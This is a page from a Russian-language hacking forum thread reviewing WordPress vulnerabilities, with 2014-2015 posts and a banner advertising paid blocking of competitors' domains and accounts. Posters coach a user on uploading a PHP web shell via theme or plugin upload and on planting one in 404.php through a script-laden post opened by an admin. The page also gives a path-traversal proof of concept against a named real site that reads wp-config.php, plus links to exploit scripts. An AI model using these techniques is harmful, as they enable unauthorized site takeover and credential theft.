УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
[ Обзор уязвимостей WordPress ]

Страница 32 из 39

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#311

20.10.2014, 04:21

nick_sale

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 0

Цитата:

Сообщение от po3t

po3t said:
у меня есть доступ к админке http://savepic.org/6279076.jpg не могу понять как туда залить шелл

попробуй подставить путь,должно открыть окно загрузки плагинов

/wp-admin/update.php?action=upload-plugin

#312

20.10.2014, 13:09

SuNDowN

Участник форума

Регистрация: 31.03.2008

Сообщений: 160

Провел на форуме:
706093

Репутация: 97

Отправить сообщение для SuNDowN с помощью ICQ

Цитата:

Сообщение от po3t

po3t said:
у меня есть доступ к админке http://savepic.org/6279076.jpg не могу понять как туда залить шелл

Зайди в установку темы, выбери файл с компа то есть твой шелл (например: shell.php) и загрузи его, выдаст какую то ошибку (всегда по разному), а шелл открывай так:

domain/wp-content/uploads/shell.php

или

domain/wp-content/uploads/2014/10/shell.php

в 99% случаях заливается.

#313

20.10.2014, 20:13

po3t

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 0

Цитата:

Сообщение от None

попробуй подставить путь,должно открыть окно загрузки плагинов
/wp-admin/update.php?action=upload-plugin

не помогло пишет недостаточно прав

Цитата:

Сообщение от None

Зайди в установку темы, выбери файл с компа то есть твой шелл (например: shell.php) и загрузи его, выдаст какую то ошибку (всегда по разному), а шелл открывай так:
domain/wp-content/uploads/shell.php
или
domain/wp-content/uploads/2014/10/shell.php
в 99% случаях заливается.

нету пункта установка тем, могу заливать только медиафайлы

Есть у кого еще идеи?

#314

26.10.2014, 12:24

djumiksc

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 0

Цитата:

Сообщение от None

Есть у кого еще идеи?

Я так понимаю, что у тебя доступ в админку юзера без админских прав.

Скорей всего это редактор.

Попробуй сделать следующее:

Создай любой пост (по теме блога) и пихни в него код

Код:

Code:

twentythirteen - это имя темы, замени его на свою.

Теперь после того, как любой авторизованный админ откроет твой пост, то выполниться скрипт и шелл будет залит в файл 404.php (шаблон 404 ошибки)

Шелл доступен по адресу

http://site.com/?p=123123123&cmd=id

#315

03.11.2014, 02:39

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от djumiksc

djumiksc said:
Я так понимаю, что у тебя доступ в админку юзера без админских прав.
Скорей всего это редактор.
Попробуй сделать следующее:
Создай любой пост (по теме блога) и пихни в него код

Код:

Code:

twentythirteen - это имя темы, замени его на свою.
Теперь после того, как любой авторизованный админ откроет твой пост, то выполниться скрипт и шелл будет залит в файл 404.php (шаблон 404 ошибки)
Шелл доступен по адресу
http://site.com/?p=123123123&cmd=id

разве там нет anti-csrf хеша ?

#316

20.01.2015, 14:01

grimnir

Guest

Сообщений: n/a

Провел на форуме:
216062

Репутация: 231

https://wpvulndb.com/

ежедневное обновление уязвимостей вп

#317

08.02.2015, 10:01

grimnir

Guest

Сообщений: n/a

Провел на форуме:
216062

Репутация: 231

https://github.com/dionach/CMSmap

CMSmap сканер уязвимостей для популярных CMS WordPress, Joomla, Drupal.

По сути,аналог WPScan , только можно использовать на Windows + поддержка веб-шелла.

#318

05.03.2015, 14:02

grimnir

Guest

Сообщений: n/a

Провел на форуме:
216062

Репутация: 231

https://github.com/joren485/WP-Slimstat-SQLI

скрипт для эксплутации бага WP-Slimstat

http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html

https://github.com/delvelabs/vane GPL форк известного сканера WPScan

#319

18.03.2015, 22:06

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

MAC PHOTO GALLERY v. 2.7

MAC PHOTO GALLERY

dork: inurllugins/mac-dock-gallery/ download

@version:2.7

Уязвимый код:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]))).[/COLOR][COLOR="#DD0000"]"/uploads/mac-dock-gallery/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'albid'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Description: File Transfer'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Type: application/octet-stream'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Disposition: attachment; filename='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Transfer-Encoding: binary'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Expires: 0'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Cache-Control: must-revalidate, post-check=0, pre-check=0'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Pragma: public'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Length: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]filesize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]ob_clean[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]flush[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

POC:

Цитата:

Сообщение от None

_ttp://rolfeckel.com/blog/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php

PATCH:

https://wordpress.org/plugins/mac-dock-gallery/other_notes/

#320

21.04.2015, 17:23

TacticiaN

Guest

Сообщений: n/a

Провел на форуме:
58244

Репутация: 0

Страница 32 из 39

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов	it's my	Веб-уязвимости	361	24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ]	[53x]Shadow	Веб-уязвимости	43	04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ]	_kREveDKo_	Веб-уязвимости	20	01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ	nike57	Уязвимости Mail-сервис	4	05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов	markel	Уязвимости Mail-сервис	3	12.09.2005 10:07

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход